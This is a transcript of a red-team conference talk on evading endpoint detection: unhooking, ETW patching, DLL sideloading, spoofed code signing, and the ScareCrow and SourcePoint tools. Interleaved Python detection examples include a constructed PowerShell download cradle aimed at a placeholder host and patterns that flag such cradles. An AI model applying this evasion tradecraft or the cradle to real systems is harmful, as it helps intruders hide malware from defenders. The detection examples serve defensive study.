Hello and welcome to my talk, Operation Bypass: Catch My Payload If You Can. My name is Matthew. I'm a technical manager at Optiv under the adversarial services practice, where I'm a lead; my role focuses primarily on red teaming, purple teaming, basically any type of adversarial, real nation-state-based attack. I've also authored numerous open source tools and frameworks. A lot of the research I've done has been focused on evasion, bypasses, and circumventing EDR and other endpoint-based controls, and I'm a Microsoft Hall of Famer related to several disclosed Microsoft COM bypasses. I've spoken at numerous places, including DEF CON's Red Team Village, DerbyCon, BSides Las Vegas, [unclear] con, and RSA.

So, a brief overview of the agenda we're going to cover today. First we're going to understand the level of detection, look at some OPSEC considerations, and understand some TTPs for the modern era. Then we'll focus in on using ScareCrow, a framework for bypassing endpoint detection tools, and then drill into the indicators of compromise, or any type of artifacts, that can lead to a detection when we're talking about command and control servers, and then introduce a new tool to help with those C2 profiles.

So to begin, this is a fairly common diagram depicting the red team life cycle. Today we're primarily going to focus on the C2 and all the aspects of it: from establishing that presence, to making sure you don't get detected, to your long-term longevity that eventually leads into post-ex techniques. But first let's define endpoint detection and response tools. How do they actually detect us and subsequently prevent our attacks?
Well, these days they primarily rely on a series of different combinations: userland hooking, being the most common; kernel callbacks; using ETW events; or the moniker of "machine learning AI", which I put in quotes because a lot of times, when we get down to it, it's usually signature-based, or a combination of the three with something else in the background. Not to dispute that there is any value to machine learning or AI; it's just that oftentimes, when we see this sold as a tool to prevent threats, it's usually something that is not selling the whole truth, and so there are a lot of misconceptions about it.

So with that in mind, how do we get around it? Well, the most common thing has been process injection, but in the more recent, modern landscape it's moving to things such as using custom system calls, using a technique called BlockDLLs, which we'll go into in a little bit, but also more and more undocumented API calls. I've posted a link here for a good buddy of mine; he does an amazing bit of research and has a great project called Alternative Shellcode Exec. This focuses on using alternative API calls and kernel callbacks to execute shellcode in ways that are not the normal way, and this by nature allows us to circumvent the normal detections and therefore establish a presence without being detected, because these are alternative ways, so EDRs and other tools are often not looking at them as a point to see if malicious activity is being performed.

So, BlockDLLs. This has been a very common and a great technique.
This is essentially a technique where you can set your process to have a flag, and this flag says "hey, only allow Microsoft-signed DLLs", which means that only system-level DLLs such as ntdll, kernelbase, kernel32, those ones, are the only ones allowed to be loaded into our process. Which means, frankly, that any type of EDR product can't load its DLL into our process to then subsequently detect our activity.

So their response to our attacks: they've started getting their DLL signed by Microsoft. That is a very effective way, because it allows them to still load in even with that flag. Deploying whitelisting controls as a feature, rather than the traditional blacklisting, whitelisting where you block everything and only allow certain applications, has been very effective, as binary-based attacks no longer work. These whitelisting rules often use hashes, so it's really hard to imitate a legitimate hash, say of cmd, with your implant.

And another kind of control: XDR. This is just the endpoint detection tools' way of gathering telemetry from different aspects rather than just the endpoint, looking at the network behavioral traffic, what's egressing, and activity between the hosts, to determine a baseline of malicious or suspicious activity, such as WMIExec calls or anything along those lines that would lead to techniques an attacker would do, or things that are out of the norm for that user, really heavily emphasizing the baselining of activity.

So, our response to their response. One of the things that I preach, in this day and age of more and more vendors having their EDR DLL signed by Microsoft, is to avoid BlockDLLs as a whole, especially for the initial foothold but also for post-ex techniques. There are a lot of great techniques coming out right now as a replacement. This really helps prevent us from being detected, as this flag of "only Microsoft-signed DLLs" isn't really standard across a lot of processes, and when we're talking about trying to blend in, that flag itself can sometimes stick out like a sore thumb, therefore drawing more attention to our process than we actually want.

With regards to whitelisting controls, we'll talk a lot more about this, but it comes down to avoiding process injection in favor of a technique called sideloading, and we're going to get into that in a little bit. With regards to XDR controls, this is really where some of the interesting stuff about blocking or in-memory patching of ETW events comes in. Since ETW and other things like that are organically built into the Windows environment, the way these things work is that when they're running they have to basically start enabling the traffic; there are no additional resources that are loaded. So by patching, terminating, or tampering with them, they don't send the right information, and therefore these controls don't really work.

And so this really comes down to the cat and mouse game and how we get better, and at the end of the day it really has to come down to: how are we getting that alert? How are teams seeing us? And it's not always the shellcode's or the implant's fault. There are a lot of different phases that get to the point of that shellcode running that can often be the catalyst for the trigger, and we really need to understand this chain of events in order to identify where we need to improve our tradecraft.

So when we look at it, the example or definition I like to run by is: there's the delivery, the loader, and the implant. The delivery is the mechanism you're going to use to get your loader onto the box, most commonly things like mshta, bitsadmin, anything that allows you to download or pull your code from a remote or local resource onto the desktop. So that's one area.
The second is the loader itself. So whether it be a binary, a DLL, a JScript file, what have you, this is the file that contains your implant as well as whatever techniques you're going to introduce, whether it be anti-sandboxing, anything for unhooking DLLs, or a decryption technique. These are the things that happen inside this process before your actual implant will run. I like to define the implant as the shellcode, or in Cobalt Strike's case the reflective DLL that runs in memory, and that essentially is responsible for establishing that remote connection out.

So once we have these three things defined, we need to understand what's detecting us. I like to break it down into two things. Behavioral, which really comes down to EDRs. EDRs really like to focus on behavioral indicators; I have the example up here of Excel spawning cmd.exe, that's a behavioral thing. But there's also signature-based. As great as it looks to us, signature-based detection, such as the historical antivirus agents, still comes into play when they're detecting things like large block strings of Base64 or shellcode.

But what is harder to understand, and often the more common reason that leads to an event, is actually something like a human interaction: a SIEM or some kind of SOC tool that's monitoring for events. This can be something like files being dropped in a location such as temp and then a process spawning from a weird location, to something even more abnormal, such as an alert that says "hey, we're seeing a lot of egress to a new destination", and tracing it back: this is a conference room PC, so why is it calling out at three in the morning?
These are all taken from real-life red team operations where there has been some kind of generated alert, and the lessons here are, for some of them, really simple: tell a more convincing story. Others are more technical, where you have to apply more advanced techniques to bypass that technical control.

So, the detection. These are the most common gotchas. As I mentioned, I like to break them down into four things to focus on when I'm developing an attack. What is the command I'm executing? Obviously these days things like PowerShell or bitsadmin are very highly indicated. There's been a lot of research; they're very prominent LOLBins. So by focusing on and using those, there's a high chance that there is some kind of rule or mechanism out there looking for their execution. Now, there are a couple of things you can do to obfuscate that, and that's really where you have to understand what you're going up against, as well as being mindful of the file type. Obviously, if you're downloading a binary straight from some random location, there are things it passes through, web proxies and external controls, and they can see this large data stream, and binaries have a universal header, so it's easy to detect. So these are all things you have to be mindful of when you're setting up this attack chain. Also, abnormal behavior.
This one's a little harder to discern, but what I like to say is that if you're going to start using commands, LOLBins, you have to understand who you are. Are you a standard user? As your user, are you someone who would probably use this, so that if a security team is looking at it they wouldn't bat an eye? It's really about blending in, telling that story.

And finally, whitelisting controls. When I talk about whitelisting controls, we have to really understand what's there. Oftentimes you have the greatest attack chain ever, but if they block your ability to run something, you'll never know it, especially in a black box situation: Beacon may not come home, your implant, your C2, essentially won't fire, and you don't know if that was a detection. So if I can leave you with one thing when we talk about detections, it's this: detections are really easy to trigger, but they can be impossible to understand unless you have the ability to look at the alert and understand what it's triggering on, and sometimes that can only be done through life lessons and experience.

Now let's talk about an example situation. We'll use Cobalt Strike as the C2. Let's say PowerShell scripted web delivery, so that would be a PowerShell script that remotely calls out, downloads, and establishes a Beacon. This is what happens: the Beacon calls home, calls home several times, before the operator even executes a command. The first command they run is whoami, and all of a sudden the Beacon stops calling home.

So let's take a look and follow this flow. Here we see the chain: cmd was used to spawn PowerShell, PowerShell was executed, and then whoami was the last process. When we look into it, we see that first and foremost, the PowerShell script, while it was an event, they don't have enough information right there. They believe there's something malicious, and it has characteristics, but it's not confirmed; they still need more data. These EDR products don't want to jump the gun or terminate, because it can actually impact business. They need the right information, because if they're terminating everything like that, it cannot be used in an environment and no one's going to use their product. So they need more data points to make that decision.

The next alert, okay, now it's a bit more severe. They see there's a Base64-encoded command and it appears to be malicious, but there are not enough indicators right now for them to know what's going on, because sometimes this could be a false positive. And then the final one: we see a recon command, obviously whoami was used, and with all this combined, that's where this alert is.

So we see this breakdown. It wasn't necessarily that the scripted web delivery was the catalyst; it was simply that enough behavioral indicators had been tripped for something to occur. So once again, oftentimes the implant itself may not be the primary cause of the detection; it can sometimes be post-ex techniques. And so when you are looking at this and you're establishing a foothold, you have to also be mindful that just because you have this foothold doesn't mean you're free and clear. There are often secondary controls that can trigger and lead to a preventative measure and the loss of a Beacon. So it's really important to understand, even if you're successful, how you were successful. Is there still something there? Are you fully flying blind? Do they have enough information? Is there something they're waiting for?
Even if you're using the latest techniques, if you're using a very common catalyst like a delivery command that's highly indicated, you can get caught really easily, and thus those highly undetectable techniques will never really be triggered or used. I like to call this fruit from a poisoned tree, because if they're already on to you from the first initial call, once again let's say PowerShell, everything subsequent is already suspect.

So going back to that event, I want to say whoami was just the tipping point. There was enough information from there because, from the behavioral instance, whoami sticks out as recon, and with everything in that attack chain it was enough to discern and confirm, based on the fact that whoami was run, that the PowerShell activity was indeed malicious. Why they did it that way might be a question: why didn't they just instantly block PowerShell? As much as we use PowerShell, it has legitimate business uses for IT and administration, so completely terminating it doesn't actually work. You need more points to make a decision. I'd also like to call out here, as an OPSEC consideration, to avoid PowerShell at all costs. These days C# tools pretty much cover the gamut of everything.
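The escalation just described, PowerShell alone being only suspicious, an encoded command raising the severity, and a recon child such as whoami tipping the verdict, can be modelled as a small correlation over process-creation telemetry. This is an added example, not code from the talk or from any EDR product; the events, weights and thresholds are constructed.

```python
"""Behavioral correlation over process-creation events.

Added example, not from the talk or from any EDR product. It models the
escalation the talk walks through: a PowerShell launch on its own is only
"suspicious", an encoded command raises the severity, and a recon command
such as whoami running under that same PowerShell is the extra data point
that tips the verdict. All events, weights and thresholds are constructed.
"""
import base64
import re
from collections import defaultdict

# Constructed process-creation events (pid, parent pid, image, command line).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand "
     + base64.b64encode(STAGER.encode("utf-16-le")).decode()},
    {"pid": 400, "ppid": 300, "image": "whoami.exe", "cmdline": "whoami"},
    # Benign admin usage: a plain script file and no recon child.
    {"pid": 500, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]

RECON_IMAGES = {"whoami.exe", "net.exe", "ipconfig.exe", "nltest.exe", "systeminfo.exe"}
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_process(ev):
    """Indicators raised by a single process, as (weight, description) pairs."""
    hits = []
    if ev["image"].lower() in {"powershell.exe", "pwsh.exe"}:
        hits.append((1, "PowerShell execution"))
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is not None:
            hits.append((2, "Base64-encoded command line"))
            if CRADLE_RE.search(decoded):
                hits.append((1, "download cradle inside encoded command"))
    return hits


def severity(score):
    """Constructed thresholds: only a high score is enough to act on."""
    if score >= 5:
        return "high"
    if score >= 3:
        return "medium"
    return "low" if score else "none"


def correlate(events):
    """Group indicators by the suspicious process that roots them.

    Returns {root_pid: {"score": int, "severity": str, "indicators": [...]}}.
    A recon command only counts when it runs under an already-scored process;
    that is what turns three weak signals into one confident alert.
    """
    by_pid = {e["pid"]: e for e in events}
    own = {e["pid"]: score_process(e) for e in events}

    def scored_ancestor(pid):
        while pid in by_pid:
            if own[pid]:
                return pid
            pid = by_pid[pid]["ppid"]
        return None

    trees = defaultdict(list)
    for e in events:
        if own[e["pid"]]:
            trees[e["pid"]].extend(own[e["pid"]])
        elif e["image"].lower() in RECON_IMAGES:
            root = scored_ancestor(e["ppid"])
            if root is not None:
                trees[root].append((3, f"recon command {e['cmdline']!r} under pid {root}"))

    result = {}
    for root, hits in trees.items():
        total = sum(w for w, _ in hits)
        result[root] = {"score": total, "severity": severity(total),
                        "indicators": [d for _, d in hits]}
    return result


if __name__ == "__main__":
    for root, verdict in correlate(EVENTS).items():
        print(f"pid {root}: {verdict['severity']} (score {verdict['score']})")
        for ind in verdict["indicators"]:
            print("   -", ind)
```

The benign PowerShell run stays at "low" because nothing else in its tree adds a data point, which is exactly why the EDR in the story waited for whoami before terminating.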
C# is highly flexible. It's easier to obfuscate, which makes it harder for blue teams, or even endpoint protection tools and anti-malware controls, to detect. So if at all possible, avoid using PowerShell, because it's highly indexed and its indicators of compromise are clearly defined.

So, some OPSEC considerations when we're building out these attack chains as well as our implants. First and foremost, let's look at the implant itself. First, I always say encryption: always use some sort of encryption, and the stronger the encryption, the better. Sometimes people ask, well, what about Base64 or something along those lines? That's good, but it's by no means a replacement for encryption. It's great to use a combination, especially when you're encrypting with AES or something like that and then Base64-encoding the string; it makes it easier to store in your file, your loader.

That being said, the next issue becomes avoiding the strings. This is a common thing that YARA rules, or any blue team, are looking for: something to write a rule or some kind of trigger on. So if they can find a static string or a value that's always going to be the same, they will use that as the catalyst to create their rule for detection. This plays away from the EDR perspective into the SIEM and SOC, all that type of stuff. So I always like to say, make your loader as polymorphic as it can be, so each time you generate it, it's always going to have different values; the strings are going to be different sizes and everything like that. That just adds a level of entropy, making it harder to see. If you look at this example YARA rule, we can see these opcodes and all these things; if these are static values, then when that triggers there will be an alert. Also, depending on how fluent or comfortable you are using uncommon languages, that is a great way to add a layer of obfuscation to your loaders. The most common languages these days for tooling are C# and C++, but looking at things like Go, Rust, or F# can be very valuable as just a natural way of obfuscating.

So, OPSEC considerations when we're talking about a loader. This is where it becomes very much an art form and situational. The key thing here is to understand your environment. What are you targeting? What controls do they have? Is there something that could just not execute in that environment for a specific reason? More to the point, what are the products, everything like that? Is it a thin client? Is it the endpoint you're targeting? Is it a limited box? If you're going to use some kind of COM object or something like that, are those COM objects related to Outlook or Word? They might not exist on the server. Those are things you need to be mindful of.

Other things can be the file name. If your file name stands out as something very suspicious, that's one major thing. If it looks more like a program that would be found in an enterprise, that makes it easier to tell that story, once again to blend in, as well as going deeper and looking at the metadata, the attributes. You don't want your home computer name or your own personal name in the metadata. And that all stems down to how it looks on disk: if it's a weird size or a weird binary, or something really weird sitting on the desktop of someone's laptop, they might see it, as well as where you're executing from. Once again, if you're executing from temp or AppData, it could be suspicious enough to warrant investigation.

I called this out before, but strings: large Base64 strings are a very easy way to get detected, and Microsoft is becoming more adept at looking for files that have large Base64 strings. By breaking them up, you make it harder to discern that "oh, this is definitely something suspicious, because there's this large string of code". And as always, binaries. I don't mean to beat up on them a lot, but binaries are really easy to detect. That's why we're going to talk right now about looking at new ways to load shellcode into memory.

So, on to the tactics, techniques, and procedures for this modern era. We talked about this a little bit, but sideloading. This is becoming more and more prevalent; threat groups around the world are using this technique more and more in favor of traditional things like binaries or even process injection attacks. This technique is simply the act of loading your DLL into a legitimate program in a malicious way. A good example is CPL files: when you execute your malicious CPL file, it will spawn rundll32, which is responsible for control panel CPLs, or control panel applets. So when you execute that CPL, it will spawn a rundll32 process, and that process will then load that CPL file into memory, if it has the proper export functions, and execute it. So what does that look like? It looks like rundll32, a legitimate process, loading something in. You see this a lot with regsvr32 as well, with DLLs. But it basically circumvents whitelisting controls a lot of the time, because these are native to the Windows operating system; these are things that are allowed, they're part of the OS, so they're often whitelisted. There are many different types of sideloads.
I just use rundll32 and regsvr32 as the most common ones out there. But what's great about these is that once they're loaded in, your loader, or whatever dropper drops that DLL or CPL, whatever catalyst you're using, you can remove it and clean it up. So the process is there, it's running in memory, and how you got it onto disk, how you got everything set up, can be cleaned away, and it's very effective.

So now let's talk about ScareCrow. ScareCrow is a framework I developed that performs a lot of the techniques we've been talking about. First and foremost, using custom system calls, it will reload ntdll, kernelbase, and kernel32, flushing out the EDR's userland hooks in them, so there won't be any hooks. It also encrypts the shellcode with AES. It patches ETW so that there's no telemetry, and it goes a step further and uses an alternative, non-standard way to execute shellcode. So everything we've just talked about is built into this framework. What it also does is, for those loaders, those files, whether it be a binary, a DLL, or a JScript file, it spoofs the attributes of ones that are legitimately found in Windows environments, ranging from cmd.exe and Word.exe to the libcrypto DLL, all these values, and it allows you to validly code sign by spoofing the attributes of a domain for a code signing cert. I've provided a link to the framework, and I'll provide it again at the end.

But talking about the loaders, there are several different ones here and I've listed them out. Primarily, it still does use binaries; there is still a place in the world for binaries. But there are also control, DLL, Excel, msiexec, and wscript.
These are all techniques to sideload. We already talked about control and DLL, but the DLL is very polymorphic; it can be used for anything. It just generates a DLL, and you can use it with any type of attack or exploit. Excel will create an Excel plugin, once again with valid attributes and a code signing cert, and then uses JScript to spawn Excel in the background and load this plugin into memory as a sideloading technique. We recently added msiexec; this creates an msiexec process and loads, once again, that DLL into memory. Wscript uses a technique called registration-free COM, which takes a manifest file, and this manifest file says "hey, you need to load this DLL into memory" and provides the attributes, everything it needs to do. So it will look for that DLL, which is our malicious DLL, and then load it into memory.

Now, because sideloading has become so prevalent, and again threat actors are using this in the wild more and more, EDRs are trying to combat it. So you can see right here: there was a malicious module loaded. They rank this as high, but what are they actually looking at? This is a really hard thing to detect and stop. Simply put, from my investigations, when they are looking at it they look for some abnormal module behavior occurring in the process. What does that mean? Sometimes it can be as simple as two DLLs being loaded at the same time with the same name. Just by changing that, there's no trigger anymore, there's no alert. So it really comes down to this: the technique is very valuable and really hard to detect. As such, ScareCrow ensures that the DLL names it loads for wscript, Excel, rundll32, and control panel are not DLLs you're ever going to see in those processes, so this alert will never be triggered.

So I wanted to provide some tips for using this framework.
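The "abnormal module behavior" the talk describes can be checked from image-load telemetry. This added example, which is not code from the talk or from ScareCrow, applies the duplicate-name condition the talk says EDRs alert on, and adds an assumed path/signature check scoped to the sideload hosts named above, which still fires when the DLL has been renamed; the events, the trusted-directory list and the boolean "signed" field are constructed.

```python
"""Module-load review for DLL sideloading hosts.

Added example, not from the talk or from ScareCrow. Two checks run over
image-load events: (1) the same DLL base name loaded twice into one process
from different paths, which the talk describes EDRs alerting on, and (2) an
assumed check that a module loaded into a known sideload host comes from a
trusted directory and is signed, which does not depend on the DLL's name.
Events are constructed; "signed" is a simplified boolean stand-in for a
real signature check.
"""
import ntpath
from collections import defaultdict

# Processes that commonly host a sideloaded DLL (from the talk's loader list).
SIDELOAD_HOSTS = {"rundll32.exe", "regsvr32.exe", "control.exe",
                  "wscript.exe", "msiexec.exe", "excel.exe"}
# Assumed: directories a module loaded into those hosts is expected to come from.
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\windows\\winsxs\\", "c:\\program files\\",
                "c:\\program files (x86)\\")

EVENTS = [  # constructed image-load events
    {"pid": 10, "image": "C:\\Windows\\System32\\rundll32.exe",
     "module": "C:\\Windows\\System32\\shell32.dll", "signed": True},
    # Same base name loaded again, this time from a user-writable path.
    {"pid": 10, "image": "C:\\Windows\\System32\\rundll32.exe",
     "module": "C:\\Users\\sally\\AppData\\Local\\Temp\\shell32.dll", "signed": False},
    # Renamed and validly signed: no duplicate name, so only the path check sees it.
    {"pid": 11, "image": "C:\\Windows\\System32\\wscript.exe",
     "module": "C:\\Users\\sally\\Downloads\\invoice\\helper.dll", "signed": True},
    {"pid": 12, "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "module": "C:\\Program Files\\Microsoft Office\\root\\Office16\\mso.dll", "signed": True},
    # Not a sideload host, so the path check is not applied.
    {"pid": 13, "image": "C:\\Windows\\System32\\notepad.exe",
     "module": "C:\\Users\\sally\\tools\\plugin.dll", "signed": False},
]


def is_trusted_path(path):
    return path.lower().startswith(TRUSTED_DIRS)


def review(events):
    """Return findings as dicts with "kind", "pid", "host" and "module"."""
    findings = []
    loaded = defaultdict(lambda: defaultdict(set))  # pid -> base name -> paths
    for e in events:
        host = ntpath.basename(e["image"]).lower()
        module = e["module"]
        name = ntpath.basename(module).lower()
        paths = loaded[e["pid"]][name]
        if paths and module.lower() not in paths:
            findings.append({"kind": "duplicate_name", "pid": e["pid"],
                             "host": host, "module": module})
        paths.add(module.lower())
        if host not in SIDELOAD_HOSTS:
            continue
        if not is_trusted_path(module):
            findings.append({"kind": "untrusted_path", "pid": e["pid"],
                             "host": host, "module": module})
        elif not e["signed"]:
            findings.append({"kind": "unsigned_module", "pid": e["pid"],
                             "host": host, "module": module})
    return findings


if __name__ == "__main__":
    for f in review(EVENTS):
        print(f"{f['kind']:16} pid={f['pid']} {f['host']} <- {f['module']}")
```

The wscript case shows why the name-only rule is weak on its own: a renamed, signed DLL raises nothing from the duplicate check and is caught only because it was loaded from the user's Downloads folder.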
The first one is the loader flag. This flag stipulates what type of loader you're going to make. As we talked about, sideloading loaders are way better than binary-based loaders, simply because they can bypass whitelisting controls. If you don't fill this in, it will by default fill it in as binary, and that might break your success. So always ensure that you know what you're using; don't just use the default. DLLs, like I said, have their place. It's really versatile, so it can be used with pretty much any type of attack: if you have a Metasploit module, or anything along those lines, or another exploit where you need a DLL as the catalyst for your implant, this is where that feature really comes into play.

The next one is the domain flag. This flag determines the domain you're going to use to spoof the code signing cert. Now, if you do have a valid code signing cert, you can enter it along with the password and it will use that to validly code sign. One thing, and it's a very common thing that I get asked, is that sometimes it doesn't work. It can't reach out; it stalls when trying to sign. That's sometimes because wherever you're creating your loader, it needs to be able to reach out to that domain. So if you're coming from a host that has no access to that domain name, or that domain doesn't actually exist, that can be a problem.

One of the biggest things I always want to stress to people is that when you're choosing the domain, never use the company's domain. Very few companies, unless they're a big tech company that actually produces software or anything like that, have a code signing cert, and therefore they're typically not going to have whitelisted one in their own EDR products across their enterprise. So stick to things that are more common in the enterprise: everyone has networks, everyone uses Windows, and so on. Those are the things that are going to give you a higher success rate when you're picking a domain.

The next thing is the delivery command. This is what we talked about. This is very, very dependent on what you're facing. Like I've been saying, LOLBins are great, but they also come with a high chance of detection, so it's a double-edged sword. The way I tell people is that HTAs are good, but macros and COM objects are better. There's always, once again, that fluidity; it depends on the environment. So the more information you get from your recon, everything like that, will really tell you which one will work better. It's never going to be that this one is always the best; it's always going to be that this one is the best for this situation, and that situation can change client to client, network to network, enterprise to enterprise, security sector to security sector, security stack to security stack.

You really want to then focus in on the user behavior. I like to always say, Sally from accounting does not know how to use certutil. So if you're trying to pretend to be Sally, maybe certutil is not the best thing for you to do; it might be a different way. And sometimes it can be as easy as this: if you have RDP-based access, it's next to impossible for any product to detect mouse and keyboard clicks. There's no way to discern that these are Sally's clicks and keyboard actions versus me as a malicious attacker. So when you're thinking about it, it really comes down to that story and what you have access to; the more you have, the better the story is.

I also wanted to provide some sample commands to get the ideas going. So here we have, as the first one, just creating a signed binary with ETW bypassing. That's the first option. The second option is a JScript. JScripts are usually my favorite, my go-to. JScript is really great for getting through those network controls and landing on the environment. So you see right here the domain flag and the loader set to control, with -O. Then finally the last one, wscript. Now, wscript is my go-to loader, just with that manifest file; it's very powerful and really hard to detect. But it might not be yours. Depending, once again, on the situation, a different loader might be better. Always keep that in mind when you're looking at these situations.

So here we have a little example. We have our loader.js and it's going to spawn, and if you look at the private bytes you can see that value going up, because our DLL is being sideloaded into the process. Once it's finished, it will start executing: it will unhook all those DLLs, then decode the shellcode using custom system calls, and once that happens it will use a different way to execute, giving us our remote shell. Here we can then enter commands without being detected.

So now let's talk indicators of compromise. What are they? Simply put, they are pieces of evidence or artifacts that can help identify malicious activity. This can be related to attacks, post-ex techniques, data breaches, or even infectious malware that we drop on environments. As our attacks become more advanced in this age, IOCs are being relied on more and more to look for this. There's a transition away from relying solely on an anti-malware control or EDR product as your sole point, to a layered approach where you have a SIEM or a SOC analyzing all this stuff, to ensure that the behavior, or anything that's dropped, or anything that happens, is then correlated to behavioral or known attack techniques. And we should care about this because this is how the game is changing. Defenders are learning from us. They're coming to our talks. They're reading our research. They're following whenever we come up with new techniques and then trying to figure out a signature to detect it. And as we modify this, so do the IOCs. So if we are constantly evolving our tradecraft, we are circumventing those predefined IOCs that they're looking for, and once again that cat and mouse game is occurring. And simply put, if we can take that further by modifying how our C2 interacts, that's a great step in keeping us always one step ahead of them. Simply put, threat actors are doing this with huge success.

So I'd like to give an example using Cobalt Strike: a C2 profile that didn't have beacon.dll stripped out. A phishing email contained a payload; when the user opened the file and enabled the macro, the shellcode executed, great, and the Beacon called home. But any time a command was executed, the EDR would block the payload. By simply stripping things such as beacon and beacon.x64 out of the profile and retrying, the EDR did not catch on to this, because it couldn't: it was looking for this and didn't see beacon.dll in memory, so it didn't have enough data points to make the decision to terminate the process. That's just one example of what we can do to manipulate our C2 to avoid detection.

Another one, once again looking at that human aspect: user agent strings. Now, this only comes into play in some cases; if you're using DNS-based Beacons, you don't really need to worry about a user agent. Also, while we're on the subject, it's really good to avoid using TCP over the internet. It's very odd; it sticks out if you're going across the internet.
HTTPS is the best But oftentimes the user the agent string can be a dead giveaway if it's something that's odd or weird Or doesn't look normal Sometimes that's an indication that there needs to be something to investigate More mature companies can go as specific as looking at well We're a firefox shop and then one day they start seeing internet explorer user agent strings that stands out from the crowd And that's can be the point of an ioc that they can start investigating on So with all of this in your mind let's introduce a new tool i'll be releasing today called source point Source point is a tool that actually generates malleable c2 profiles for cobalt strike Uh, talking using all these features. We kind of talk to it and more It really ensures that each time you generate a profile regardless if you put the same values in The actual profile itself will be unique so you can generate multiple profiles using the same values and they'll be unique from each other There's over 15 different customization options in this tool alone for you to select But if you choose to use leave them blank that we randomly selected for you So you're always ensuring, you know a high level of entropy It does you know 15 Options can seem daunting. So there is yaml support. So it's really good to use a yaml file So you can always have kind of like your go-to sampling that you can start modifying it is written go but it's simply using a template based language to generate these uh profiles So some of the features it has as I mentioned before by that user agent strength There's over 60 ranging from windows 10 windows 10 chrome windows 10 i.e firefox server mac Linux you get you kind of get this in the picture. So there's a lot of them also different options for p-header There's over 21 currently built into it. 
There are seven different types of profiles for your traffic to be shaped to um In right now it does strip out 95 strings that you know edr is used to look and detect shellcode Especially around your cobalt strike. You can kind of see right here a large list of them Now usually the question I get is well, there's options to obfuscate and encrypt. So why would I bother with this? oftentimes All that stuff gets down to the point that it's a great way to avoid detection But at some point it needs to be read and interpreted by the The system so it has to be in an unencrypted state for it to be processed on the stack properly And that's when those detection over alerts can be triggered. So that's why going through this I've looked through and it's found the common Indicators of compromise looking for commonalities and things that they would look for and just removing them Um, as I mentioned before there is a lot of ram realization. So the values for allocations on different features are always changing Obviously, there's you know sleep jitter, you know, you're kind of standard things But more interesting thing is the manipulation of injection based strings for post-ex. There's even 18 options Um, I like to also call we can kind of see right here. This is a great Document or an image if you haven't had a chance, please look go ahead look at this It is basically a parent relation process map of normal windows processes And they're parented child processes. So with this when we're talking about, you know Post-ex or any type of spawn two processes, especially like execute assembly. We can actually map process with a More realistic child process for spawning and it makes sense and it's harder just to detect and it doesn't stand out as much Uh, this right this tool source point has cdn support for anything that you need for cdn Depending on how you're setting up your your c2 as well as allocation manipulation values also supports ssl certificates So why use it? 
Uh, it's been development for several years. It's been deployed on hundreds of red team ops prior to today's public release Uh, the most important thing I would probably say is unique profiles if you're taking something That is static or using something that's the same profile over and over again for multiple engagements Uh, eventually if you're going to get caught burnt Um, especially if it you're basing it off as something that's public and you're not really modifying it extensively chances are other people are downloading it and doing the same thing. So having completely unique profiles really does aid and once again keeping one step ahead of blue teams another reason is it automates the process And reduces the basically overhead of building and stripping out these iocs from your c2 Uh, my personal favorite is human error, you know people make mistakes. I I often make them That's why I developed this is that way I can do it once and have it automate it Uh, so I couldn't show an example template because they just run off the screen We can be here for hours going through all the different features Uh, but to kind of show you what the results are from c2 in it You can kind of see right here how it looks all the different features what it's done the transformations everything like that The values and how it just really blends in So my final thoughts before we wrap up, um We really need to as red teamers Understand blue teams and their procedures better from that we can understand how they're detecting us What we can do to go around those detections Uh, simply blue teamers are attending our talks. They're reading our research every time we publish something They're reading it. They're learning it so that way they can, you know fine tune their tradecraft to be better at detecting it So we really need to do that and that's how this cat and mouse game is going to work and continuously keep uh continue Lastly at the end of the day for us to be better red teamers. 
We need to start learning blue So any questions, um, you can find the scarecrow framework for bypassing edrs and all that stuff for developing implants um here Source plan can be found on my github along with the slides If you have any questions or ever want to talk about the stuff, you know, I this this is my passion my bread and butter I really spend a lot of free time Doing this and learning and kind of advancing my own tradecraft So if you ever have a question I want to talk feel free to reach out to me my twitter github Before I wrap up today. I just want to say thank you for attending my talk Have a great day
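Two of the IOC classes the talk raises are baseline-versus-observed checks from the blue team's side: the "we're a Firefox shop, so why are we suddenly seeing Internet Explorer user agent strings?" case, and the parent-child process map that makes an unusual spawnto parent stand out. The following is an added example of how a defender would run both checks over telemetry; it is not code from SourcePoint, ScareCrow, Cobalt Strike or the talk. The proxy log format, every log line, hostname and process pair are constructed for illustration, and the function names (`ua_family`, `learn_baseline`, `find_outliers`, `ua_findings`, `process_findings`) are my own.

```python
"""
Defender-side baseline checks for two of the IOC classes discussed in the talk:
  1. user agent strings that fall outside what the environment normally sends,
  2. parent/child process pairs that fall outside the expected process map.
Added example; not SourcePoint, ScareCrow or Cobalt Strike code. Every log line,
hostname and process pair below is constructed for illustration.
"""
import re
from collections import Counter

# Constructed proxy log format: <timestamp> <src_ip> <method> <url> "<user-agent>"
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"

# Known-good window used to learn what "normal" looks like (constructed).
BASELINE_LOG = f"""\
2024-01-01T09:00:01Z 10.0.0.11 GET https://www.example.com/ "{FIREFOX_UA}"
2024-01-01T09:00:02Z 10.0.0.12 GET https://www.example.com/ "{FIREFOX_UA}"
2024-01-01T09:00:03Z 10.0.0.13 GET https://cdn.example.net/a.js "{FIREFOX_UA}"
2024-01-01T09:05:00Z 10.0.0.14 GET https://www.example.com/ "{FIREFOX_UA}"
"""

# Window under review (constructed): one host sends an IE-era string, one sends a bare token.
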